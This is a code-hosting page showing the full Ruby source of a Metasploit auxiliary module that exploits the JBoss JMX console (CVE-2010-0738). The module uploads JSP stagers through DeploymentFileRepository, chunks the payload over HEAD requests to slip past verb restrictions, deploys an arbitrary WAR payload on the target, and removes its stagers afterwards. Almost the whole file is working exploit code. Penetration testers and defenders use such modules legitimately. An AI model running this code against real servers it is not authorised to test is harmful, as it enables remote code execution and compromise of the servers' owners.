Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb
19515 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HTTP::JBoss
8
9
def initialize
10
super(
11
'Name' => 'JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment',
12
'Description' => %q{
13
This module uses the DeploymentFileRepository class in the JBoss Application Server
14
to deploy a JSP file which then deploys an arbitrary WAR file.
15
},
16
'Author' => [
17
'us3r777 <us3r777[at]n0b0.so>'
18
],
19
'References' => [
20
[ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
21
[ 'OSVDB', '64171' ],
22
[ 'URL', 'https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now' ],
23
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ]
24
],
25
'Actions' => [
26
['Deploy', { 'Description' => 'Create and deploy app (WAR) to deliver payload' }],
27
['Undeploy', { 'Description' => 'Remove app (WAR) for cleanup' }]
28
],
29
'DefaultAction' => 'Deploy',
30
'License' => BSD_LICENSE,
31
'Notes' => {
32
'Stability' => [CRASH_SAFE],
33
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK],
34
'Reliability' => []
35
}
36
)
37
38
register_options(
39
[
40
Opt::RPORT(8080),
41
OptString.new('APPBASE', [ true, 'Application base name', 'payload']),
42
OptPath.new('WARFILE', [ false, 'The WAR file to deploy'])
43
]
44
)
45
end
46
47
def deploy_action(app_base, war_data)
48
stager_base = Rex::Text.rand_text_alpha(rand(8..15))
49
stager_jsp_name = Rex::Text.rand_text_alpha(rand(8..15))
50
encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
51
stager_contents = stager_jsp_with_payload(app_base, encoded_payload)
52
53
if http_verb == 'POST'
54
print_status('Deploying stager for the WAR file...')
55
res = upload_file(stager_base, stager_jsp_name, stager_contents)
56
else
57
print_status('Deploying minimal stager to upload the payload...')
58
head_stager_jsp_name = Rex::Text.rand_text_alpha(rand(8..15))
59
head_stager_contents = head_stager_jsp(stager_base, stager_jsp_name)
60
head_stager_uri = '/' + stager_base + '/' + head_stager_jsp_name + '.jsp'
61
res = upload_file(stager_base, head_stager_jsp_name, head_stager_contents)
62
63
# We split the stager_jsp_code in multiple junks and transfer on the
64
# target with multiple requests
65
current_pos = 0
66
while current_pos < stager_contents.length
67
next_pos = current_pos + 5000 + rand(100)
68
vars_get = { 'arg0' => stager_contents[current_pos, next_pos] }
69
print_status("Uploading second stager (#{current_pos}/#{stager_contents.length})")
70
res = deploy('uri' => head_stager_uri,
71
'vars_get' => vars_get)
72
current_pos += next_pos
73
end
74
end
75
76
# Using HEAD may trigger a 500 Internal Server Error (at least on 4.2.3.GA),
77
# but the file still gets written.
78
unless res && (res.code == 200 || res.code == 500)
79
fail_with(Failure::Unknown, 'Failed to deploy')
80
end
81
82
print_status('Calling stager to deploy the payload warfile (might take some time)')
83
stager_uri = '/' + stager_base + '/' + stager_jsp_name + '.jsp'
84
deploy('uri' => stager_uri,
85
'method' => 'GET')
86
87
if res && res.code == 200
88
print_good('Payload deployed')
89
else
90
print_error('Failed to deploy final payload')
91
end
92
93
# Cleaning stagers
94
print_status('Undeploying stagers via DeploymentFileRepository.remove()...')
95
print_status('This might take some time, be patient...') if http_verb == 'HEAD'
96
delete_res = []
97
if head_stager_jsp_name
98
delete_res << delete_file(stager_base + '.war', head_stager_jsp_name, '.jsp')
99
end
100
delete_res << delete_file(stager_base + '.war', stager_jsp_name, '.jsp')
101
delete_res << delete_file('./', stager_base + '.war', '')
102
delete_res.each do |r|
103
if !r
104
print_warning('Unable to remove WAR [No Response]')
105
elsif r.code < 200 || r.code >= 300
106
print_warning("WARNING: Unable to remove WAR [#{r.code} #{r.message}]")
107
end
108
end
109
end
110
111
# Undeploy the WAR and the stager if needed
112
def undeploy_action(app_base)
113
print_status("Undeploying #{app_base} via DeploymentFileRepository.remove()...")
114
print_status('This might take some time, be patient...') if http_verb == 'HEAD'
115
res = delete_file('./', app_base + '.war', '')
116
117
unless res
118
print_error('Unable to remove WAR (no response)')
119
return
120
end
121
122
if res.code < 200 || res.code >= 300
123
print_error("Unable to remove WAR [#{res.code} #{res.message}]")
124
else
125
print_good('Successfully removed')
126
end
127
end
128
129
def run
130
app_base = datastore['APPBASE']
131
132
case action.name
133
when 'Deploy'
134
unless datastore['WARFILE'] && File.exist?(datastore['WARFILE'])
135
fail_with(Failure::BadConfig, 'Unable to open WARFILE')
136
end
137
war_data = File.read(datastore['WARFILE'], mode: 'rb')
138
deploy_action(app_base, war_data)
139
when 'Undeploy'
140
undeploy_action(app_base)
141
end
142
end
143
end
144
145